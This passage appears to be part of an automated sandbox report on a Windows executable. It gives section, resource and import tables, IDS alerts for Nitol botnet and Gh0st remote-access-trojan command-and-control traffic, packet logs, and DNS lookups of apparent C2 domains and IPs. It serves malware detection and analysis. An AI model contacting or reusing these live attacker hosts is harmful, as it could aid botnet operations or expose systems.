.data	0x9000	0x1af78	0x400	e59cdcb732e4bfbc84cc61dd68354f78	False	0.55078125	data	4.617802320695973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x8000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2c000	0x57180	0x57200	f51866e7e004246d34522d99909dd728	False	0.28211587607604016	data	3.929478885850329	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2c2b0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 0	English	United States	0.25987883539959167
RT_ICON	0x6e2d8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 0	English	United States	0.31632260735833434
RT_ICON	0x7eb00	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	United States	0.4346473029045643
RT_ICON	0x810a8	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3072	English	United States	0.5481481481481482
RT_ICON	0x81d50	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	English	United States	0.5434426229508197
RT_ICON	0x826d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	United States	0.6453900709219859
RT_DIALOG	0x82b40	0x144	data	English	United States	0.5216049382716049
RT_DIALOG	0x82c88	0x100	data	English	United States	0.5234375
RT_DIALOG	0x82d88	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x82ea8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x82f08	0x5a	data	English	United States	0.8111111111111111
RT_MANIFEST	0x82f68	0x215	XML 1.0 document, ASCII text, with very long lines (533), with no line terminators	English	United States	0.575984990619137

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll	RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49767	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49857	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49901	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49956	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49865	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49713	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49820	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49989	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49912	46.82.174.69	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49720	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49774	8.7.198.46	8090	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49945	120.48.34.233	8080	TCP
2024-12-23T09:01:20.628261+0100	2807550	ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3	1	192.168.2.9	49814	120.48.34.233	8080	TCP
2024-12-23T09:01:27.972349+0100	2013214	ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server	1	192.168.2.9	49707	120.48.34.233	8000	TCP
2024-12-23T09:01:27.972349+0100	2016922	ET MALWARE Backdoor family PCRat/Gh0st CnC traffic	1	192.168.2.9	49707	120.48.34.233	8000	TCP
2024-12-23T09:01:28.392042+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49713	120.48.34.233	8080	TCP
2024-12-23T09:01:28.949435+0100	2048478	ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive	1	120.48.34.233	8000	192.168.2.9	49707	TCP
2024-12-23T09:01:28.949435+0100	2808814	ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response	1	120.48.34.233	8000	192.168.2.9	49707	TCP
2024-12-23T09:01:30.624146+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49720	8.7.198.46	8090	TCP
2024-12-23T09:01:50.831677+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49767	120.48.34.233	8080	TCP
2024-12-23T09:01:53.205437+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49774	8.7.198.46	8090	TCP
2024-12-23T09:02:13.473112+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49814	120.48.34.233	8080	TCP
2024-12-23T09:02:15.979966+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49820	8.7.198.46	8090	TCP
2024-12-23T09:02:35.999010+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49857	120.48.34.233	8080	TCP
2024-12-23T09:02:39.320654+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49865	46.82.174.69	8090	TCP
2024-12-23T09:02:58.388861+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49901	120.48.34.233	8080	TCP
2024-12-23T09:03:01.971236+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49912	46.82.174.69	8090	TCP
2024-12-23T09:03:21.114463+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49945	120.48.34.233	8080	TCP
2024-12-23T09:03:27.358663+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49956	46.82.174.69	8090	TCP
2024-12-23T09:03:43.593518+0100	2025135	ET MALWARE [PTsecurity] Botnet Nitol.B Checkin	1	192.168.2.9	49989	120.48.34.233	8080	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 09:01:27.309005976 CET	49707	8000	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:27.428514004 CET	8000	49707	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:27.429425955 CET	49707	8000	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:27.972348928 CET	49707	8000	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:28.092051029 CET	8000	49707	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:28.261584044 CET	49713	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:28.381030083 CET	8080	49713	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:28.382185936 CET	49713	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:28.392041922 CET	49713	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:28.473566055 CET	49714	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:28.511744976 CET	8080	49713	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:28.949434996 CET	8000	49707	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:28.991348028 CET	49707	8000	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:29.478861094 CET	49714	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:30.499006987 CET	49720	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:30.619762897 CET	8090	49720	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:30.619873047 CET	49720	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:30.624145985 CET	49720	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:30.743621111 CET	8090	49720	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:31.494481087 CET	49714	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:39.262633085 CET	49740	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:40.275746107 CET	49740	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:42.291440010 CET	49740	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:50.296468019 CET	8080	49713	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:50.296577930 CET	49713	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:50.296652079 CET	49713	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:50.416238070 CET	8080	49713	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:50.668209076 CET	49767	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:50.787794113 CET	8080	49767	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:50.787890911 CET	49767	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:50.831676960 CET	49767	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:01:50.951185942 CET	8080	49767	120.48.34.233	192.168.2.9
Dec 23, 2024 09:01:51.308129072 CET	49768	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:52.322657108 CET	49768	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:01:52.530970097 CET	8090	49720	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:52.531028986 CET	49720	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:52.531130075 CET	49720	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:52.699199915 CET	8090	49720	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:53.066256046 CET	49774	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:53.185925007 CET	8090	49774	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:53.186050892 CET	49774	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:53.205436945 CET	49774	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:01:53.325129032 CET	8090	49774	8.7.198.46	192.168.2.9
Dec 23, 2024 09:01:54.322629929 CET	49768	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:05.458664894 CET	49798	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:06.635112047 CET	49798	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:12.687206984 CET	8080	49767	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:12.691040993 CET	49767	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:12.691040993 CET	49767	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:12.810627937 CET	8080	49767	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:13.206607103 CET	49814	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:13.326400995 CET	8080	49814	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:13.327873945 CET	49814	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:13.473112106 CET	49814	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:13.592803001 CET	8080	49814	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:15.078399897 CET	8090	49774	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:15.078636885 CET	49774	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:15.078686953 CET	49774	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:15.198329926 CET	8090	49774	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:15.801204920 CET	49820	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:15.920835972 CET	8090	49820	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:15.920917988 CET	49820	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:15.979965925 CET	49820	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:16.099468946 CET	8090	49820	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:21.323402882 CET	49831	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:22.432017088 CET	49831	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:35.219206095 CET	8080	49814	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:35.219320059 CET	49814	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:35.219425917 CET	49814	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:35.338879108 CET	8080	49814	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:35.855015993 CET	49857	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:35.974698067 CET	8080	49857	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:35.974812031 CET	49857	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:35.999010086 CET	49857	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:36.118805885 CET	8080	49857	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:37.828370094 CET	8090	49820	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:37.828466892 CET	49820	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:37.833422899 CET	49820	8090	192.168.2.9	8.7.198.46
Dec 23, 2024 09:02:37.953042984 CET	8090	49820	8.7.198.46	192.168.2.9
Dec 23, 2024 09:02:38.244786024 CET	49859	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:39.180397034 CET	49865	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:02:39.300158978 CET	8090	49865	46.82.174.69	192.168.2.9
Dec 23, 2024 09:02:39.300235987 CET	49865	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:02:39.320653915 CET	49865	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:02:39.322612047 CET	49859	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:39.440367937 CET	8090	49865	46.82.174.69	192.168.2.9
Dec 23, 2024 09:02:51.651910067 CET	49886	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:52.744492054 CET	49886	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:54.748334885 CET	49886	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:02:57.891376019 CET	8080	49857	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:57.891484976 CET	49857	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:57.891562939 CET	49857	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:58.011149883 CET	8080	49857	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:58.236731052 CET	49901	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:58.356364012 CET	8080	49901	120.48.34.233	192.168.2.9
Dec 23, 2024 09:02:58.356431961 CET	49901	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:58.388860941 CET	49901	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:02:58.508311987 CET	8080	49901	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:01.188460112 CET	8090	49865	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:01.188584089 CET	49865	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:01.203162909 CET	49865	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:01.322906971 CET	8090	49865	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:01.837568998 CET	49912	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:01.957370996 CET	8090	49912	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:01.957520008 CET	49912	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:01.971235991 CET	49912	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:02.091120958 CET	8090	49912	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:03.487463951 CET	49913	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:04.635126114 CET	49913	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:06.650738001 CET	49913	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:18.761652946 CET	49944	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:19.822778940 CET	49944	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:20.266613007 CET	8080	49901	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:20.266696930 CET	49901	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:20.278000116 CET	49901	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:20.397490025 CET	8080	49901	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:20.947494984 CET	49945	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:21.067136049 CET	8080	49945	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:21.067209959 CET	49945	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:21.114463091 CET	49945	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:21.234143972 CET	8080	49945	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:23.860250950 CET	8090	49912	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:23.860315084 CET	49912	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:23.925561905 CET	49912	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:24.045438051 CET	8090	49912	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:24.808881044 CET	49956	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:24.928639889 CET	8090	49956	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:24.928721905 CET	49956	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:27.358663082 CET	49956	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:27.478358984 CET	8090	49956	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:32.248712063 CET	49968	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:33.338233948 CET	49968	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:35.432018995 CET	49968	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:39.431999922 CET	49968	80	192.168.2.9	192.168.2.1
Dec 23, 2024 09:03:42.970238924 CET	8080	49945	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:42.970336914 CET	49945	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:42.970494032 CET	49945	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:43.089947939 CET	8080	49945	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:43.466651917 CET	49989	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:43.589922905 CET	8080	49989	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:43.590049982 CET	49989	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:43.593518019 CET	49989	8080	192.168.2.9	120.48.34.233
Dec 23, 2024 09:03:43.713032007 CET	8080	49989	120.48.34.233	192.168.2.9
Dec 23, 2024 09:03:46.845423937 CET	8090	49956	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:46.845567942 CET	49956	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:46.845746994 CET	49956	8090	192.168.2.9	46.82.174.69
Dec 23, 2024 09:03:46.965298891 CET	8090	49956	46.82.174.69	192.168.2.9
Dec 23, 2024 09:03:47.431973934 CET	49968	80	192.168.2.9	192.168.2.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 09:01:28.665868998 CET	54125	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:29.670260906 CET	54125	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:30.498198986 CET	53	54125	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:30.498219967 CET	53	54125	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:32.565638065 CET	64516	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:32.799855947 CET	53	64516	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:32.801898956 CET	56492	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:33.028306007 CET	53	56492	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:33.031330109 CET	64331	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:33.075165033 CET	62205	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:33.212970972 CET	53	62205	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:33.213119030 CET	53	64331	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:43.420120001 CET	50508	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:43.557501078 CET	53	50508	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:47.859332085 CET	51122	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:47.996969938 CET	53	51122	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:53.763612032 CET	63476	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:53.901804924 CET	53	63476	1.1.1.1	192.168.2.9
Dec 23, 2024 09:01:58.220653057 CET	59117	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:01:58.358697891 CET	53	59117	1.1.1.1	192.168.2.9
Dec 23, 2024 09:02:38.731265068 CET	57751	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:02:39.132702112 CET	53	57751	1.1.1.1	192.168.2.9
Dec 23, 2024 09:03:15.948908091 CET	57629	53	192.168.2.9	1.1.1.1
Dec 23, 2024 09:03:16.086868048 CET	53	57629	1.1.1.1	192.168.2.9

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 23, 2024 09:01:28.473617077 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:29.478907108 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:31.494524956 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:39.262734890 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:40.275851965 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:42.291501999 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:51.308175087 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:52.322698116 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:01:54.322693110 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:05.458766937 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:06.635174990 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:21.323445082 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:22.432065010 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:38.244836092 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:39.322666883 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:51.651959896 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:52.744534016 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:02:54.748383045 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:03.487519026 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:04.635226965 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:06.650788069 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:18.761710882 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:19.822830915 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:32.248764038 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:33.338289022 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:35.432100058 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:39.432068110 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable
Dec 23, 2024 09:03:47.432035923 CET	192.168.2.1	192.168.2.9	827e	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 09:01:28.665868998 CET	192.168.2.9	1.1.1.1	0x90b7	Standard query (0)	chinagov.8800.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:29.670260906 CET	192.168.2.9	1.1.1.1	0x90b7	Standard query (0)	chinagov.8800.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:32.565638065 CET	192.168.2.9	1.1.1.1	0x61f8	Standard query (0)	www.wk1888.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:32.801898956 CET	192.168.2.9	1.1.1.1	0x1ee1	Standard query (0)	www.af0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:33.031330109 CET	192.168.2.9	1.1.1.1	0x2dc8	Standard query (0)	www.fz0575.com	A (IP address)	IN (0x0001)	false
Dec 23, 2024 09:01:33.075165033 CET	192.168.2.9	1.1.1.1	0x3740	Standard query (0)	www.wk1888.com	A (IP address)	IN (0x0001)	false
